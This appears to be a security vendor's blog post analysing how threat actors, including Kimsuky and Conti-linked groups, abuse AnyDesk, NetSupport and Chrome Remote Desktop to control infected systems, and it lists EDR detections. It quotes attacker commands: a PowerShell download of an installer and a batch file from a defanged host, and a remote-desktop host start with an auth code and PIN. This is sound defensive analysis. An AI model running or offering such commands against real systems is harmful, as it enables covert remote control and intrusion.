Remote administration tools are software for managing and controlling terminals at remote locations. The tools can be used as work-at-home solutions in circumstances such as the COVID-19 pandemic and for the purpose of controlling, managing, and repairing unmanned devices remotely. Such remote control tools used for legitimate purposes are called RAT, meaning “Remote Administration Tools.”
Additionally, backdoor malware types such as Remcos RAT, njRAT, Quasar RAT, and AveMaria are called Remote Access Trojans (RAT) because these also make it possible to control infected systems remotely. Such “Remote Access Trojan” malware types offer not only remote control features but also various features that can be used maliciously, such as keylogging or commands for stealing account credentials from the infected system. Of course, there are cases such as that of Remcos RAT where the developer promotes its normal features and states that malicious use is prohibited, but the features being offered are mostly used for malicious purposes. [1]
Figure 1. Various remote control malware types
Generally, threat actors often use “Remote Access Trojans” to control the infected systems. Yet such malware are easily detected by firewalls or anti-malware products. Accordingly, there have been an increase in cases where “Remote Administration Tools” are installed to control the infected system and attempt to bypass security products.
1. Threat Monitoring Using EDR
“Remote Administration Tools” are often used for legitimate purposes such as working from home or remote control and management. As such, there are limits to anti-malware products simply detecting and blocking these tools unlike other malware.
Threat actors take advantage of this fact and sometimes install remote administration tools instead of RAT-type malware in the initial access or lateral movement stages to control the target system. As mentioned above, systems with only anti-malware products installed cannot completely block such attacks. EDR must be used to monitor and respond to suspicious behaviors.
AhnLab Endpoint Detection and Response (EDR) is a next-generation threat detection and response solution, providing powerful threat monitoring, analysis, and response capabilities for endpoint areas based on South Korea’s only self-behavior-based engine. It continuously collects information related to suspicious behaviors based on each type and offers features that allow users to accurately identify threats in light of detection, analysis, and response. Through a comprehensive analysis based on the data, users can identify the cause, make appropriate responses, and establish recurrence prevention processes.
Figure 2. AhnLab EDR product
2. AnyDesk
AnyDesk is a remote control application that provides various features such as remote desktop and sending files. Remote desktop is a program that allows a user to remotely access an environment where RDP or AnyDesk is installed and control it in a GUI environment.
Figure 3. AnyDesk remote desktop application
When a user has AnyDesk installed in their environment and there is an external access to the system, a message pops up. If the user allows that access, the system can be remotely controlled. Alternatively, one can set up a password for AnyDesk: simply entering the password makes it possible to remotely control the system without the user’s permission. As such, AnyDesk is known to be used alongside Cobalt Strike by attackers wishing to dominate a company’s internal network, such as the Conti ransomware group.
AhnLab EDR collects and provides behaviors of users using AnyDesk for legitimate remote control purposes, allowing them to recognize and respond to suspicious behaviors.
Figure 4. AnyDesk execution log – EDR detection
In a past attack case, a threat actor installed AnyDesk on a poorly managed MS-SQL server. [2] The threat actor used Meterpreter to download and execute a PowerShell script. This script downloaded AnyDesk from the official website as shown below to install it in silent mode and set the password to “wocaoybb”.
Figure 5. PowerShell routine for installing AnyDesk
If AnyDesk is installed on the infected system using the method mentioned above, the attacker can access the infected system and remotely control it without the user’s permission by entering a password.
Figure 6. Logging in to a remote system where AnyDesk is installed
Figure 7. Remote control using AnyDesk
AhnLab EDR detects the behavior of threat actors installing AnyDesk in suspicious ways as shown above to let administrators become aware of such behaviors.
Figure 8. EDR detection of the threat actor installing AnyDesk
3. NetSupport
NetSupport is a remote control tool similar to AnyDesk. Besides remote screen control, it provides features such as taking screenshots, sharing clipboard content, collecting web history information, managing files, and executing commands.
Figure 9. Features supported by NetSupport
AhnLab EDR collects and provides behaviors of users using NetSupport for legitimate remote control purposes, allowing them to recognize and respond to suspicious behaviors.
Figure 10. NetSupport execution log – EDR detection
Many threat actors abuse NetSupport because unlike other remote control tools, it supports features that can be used for malicious purposes. In addition, it can be run using only key internal files without the need for an installation process using a normal installer. It is distributed by spam emails disguised as invoices, shipment documents, and purchase orders or luring users to install it themselves using a phishing page disguised as an update page for software called SocGholish, both of which have occurred until recently. The ASEC Blog once covered a case of NetSupport distribution disguised as a Pokemon game. [3]
Figure 11. Page disguised as Pokemon card game page
The threat actor created a phishing page disguised as a Pokemon card game page, luring users to download the setup file from it. The downloaded file is a malware that installs NetSupport, creating and executing legitimate NetSupport instances as well as a configuration file manipulated by the threat actor. Whenever threat actors distribute malware, they evade file detection by anti-malware products by changing the file type. As a result, there is a limit to file-based detection. The behavior is also that of installing NetSupport that is legitimate software, and anti-malware products cannot completely detect and block such behaviors.
Figure 12. Installed NetSupport files and configuration file
AhnLab EDR detects the behavior of a suspicious executable file installing NetSupport to let administrators become aware of such incidents.
Figure 13. EDR detection of a suspicious program installing NetSupport
4. Chrome Remote Desktop
Google offers a feature called Chrome Remote Desktop. When the remote desktop program is installed in a certain system with a user account, the Chrome web browser can be used to remotely control that system. In most cases, remote control settings are configured in the Chrome browser of the remote control target. However, Chrome also supports the method of directly installing a remote control host program in the system.
For example, the Chrome Remote Control Host program can be installed in the target device for control, which allows command line commands to be executed with the following arguments. These commands can be created after logging into the Chrome web browser with the authentication code being different for each session.
| “%PROGRAMFILES(X86)%\Google\Chrome Remote Desktop\CurrentVersion\remoting_start_host.exe” –code=”authentication code” –redirect-url=”hxxps://remotedesktop.google[.]com/_/oauthredirect” –name=%COMPUTERNAME% |
Figure 14. Chrome Remote Desktop host program execution command
If you enter the PIN number after the commands shown above are executed, the Chrome browser will show that the remote control target device is online. Connecting to the target device and entering the PIN number used when executing the Chrome Remote Control Host will allow the target to be controlled through the Chrome web browser.
Figure 15. Target device for remote control being online
AhnLab EDR collects and provides behaviors of users using Chrome Remote Desktop for legitimate remote control purposes, allowing them to recognize and respond to suspicious behaviors.
Figure 16. Chrome Remote Desktop execution log – EDR detection
The Kimsuky group known to be supported by North Korea usually launches attacks for the purpose of exfiltrating internal information and technology from organizations. Accordingly, after installing backdoor-type malware, the group would activate RDP or additionally install malware such as VNC to control the infected system remotely. There were recent cases of exploiting Chrome Remote Desktop to control the infected systems. [4]
The threat actor executed the following PowerShell commands to install the Chrome Remote Desktop Host installer, downloading and executing 23.bat which controls the Host program after the install process was complete.
| powershell wget hxxps://dl.google[.]com/dl/edgedl/chrome-remote-desktop/chromeremotedesktophost.msi -outfile c:\programdata\cm.msi powershell wget hxxp://****[.]kr/gnuboard4/23.bat -outfile c:\programdata\23.bat |
The content of the file 23.bat is similar to the Chrome remote desktop execution commands shown above, given the “–pin” argument to be run without any additional tasks from the command line. The authentication code used in the attack was created with the threat actor’s Google account. Subsequently, the threat actor was able to control the infected system from their Chrome web browser.
Figure 17. 23.bat file content
| “%PROGRAMFILES(X86)%\Google\Chrome Remote Desktop\CurrentVersion\remoting_start_host.exe” –code=”4/0AbUR2VPfKC4jyx4j-ARJD2NwkebJQOTbicMGcNW1kUn7UNhE0VNaycr3zDhY4tRx9JT4eg” –redirect-url=”hxxps://remotedesktop.google[.]com/_/oauthredirect” –name=%COMPUTERNAME% –pin=230625 |
AhnLab EDR detects the behavior of Chrome Remote Desktop being executed under suspicious circumstances and let administrators become aware of the incident.
Figure 18. EDR detection of a suspicious Chrome Remote Desktop execution
5. Conclusion
Recently, there has been an increase in the number of cases where threat actors installed remote control tools to control targets systems instead of installing additional malware such as RATs and backdoors. Remote administration tools are legitimate software that can be used to control or manage terminals at a remote location.
By installing remote administration tools in a target system, the threat actor was able to simultaneously obtain control over the system and bypass anti-malware security products. This is because there are limits to anti-malware products simply detecting and blocking remote administration tools which are legitimate.
Even when users use remote administration tools for legitimate remote control purposes, AhnLab EDR collects and provides related data to allow administrators to recognize and respond to suspicious behaviors. Also, when remote administration tools are installed under suspicious circumstances, such behaviors are detected as threats to enable administrators to identify the cause, make adequate responses, and establish recurrence prevention processes.
Behavior Detection
– Execution/DETECT.AnyDesk.M11495
– Execution/EDR.AnyDesk.M11496
– Execution/DETECT.NetSupport.M11497
– Execution/EDR.NetSupport.M11498
– Execution/DETECT.RemoteDesktop.M11499
– Execution/EDR.RemoteDesktop.M11500
AhnLab EDR protects the endpoint environment by delivering behavioral detection, advanced analysis, holistic visibility, and proactive threat hunting. For more information about the product, please visit our official website.
The post Control of Infected Systems Through Remote Administration Tools (Detected by EDR) appeared first on ASEC BLOG.
Article Link: Infected Systems Controlled Through Remote Administration Tools (Detected by EDR) - ASEC BLOG